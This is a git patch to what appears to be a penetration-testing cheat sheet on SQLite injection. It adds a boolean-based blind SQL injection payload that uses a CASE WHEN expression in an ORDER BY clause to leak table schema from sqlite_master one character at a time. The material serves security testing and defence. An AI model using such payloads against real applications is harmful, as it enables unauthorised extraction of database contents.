From 418285b7f6ee21bb46a746c39f4fddaac6b4e5cc Mon Sep 17 00:00:00 2001
From: nerrorsec <42860825+nerrorsec@users.noreply.github.com>
Date: Sat, 13 Aug 2022 10:07:54 +0545
Subject: [PATCH] Boolean - Extract info (order by)

---
 SQL Injection/SQLite Injection.md | 7 +++++++
 1 file changed, 7 insertions(+)

diff --git a/SQL Injection/SQLite Injection.md b/SQL Injection/SQLite Injection.md
index 2cdc050..f7d9455 100644
--- a/SQL Injection/SQLite Injection.md	
+++ b/SQL Injection/SQLite Injection.md	
@@ -71,6 +71,13 @@ and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name
 and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char')
 ```
 
+## Boolean - Extract info (order by)
+
+```sql
+CASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) = hex('some_char') THEN <order_element_1> ELSE <order_element_2> END
+```
+
+
 ## Time based
 
 ```sql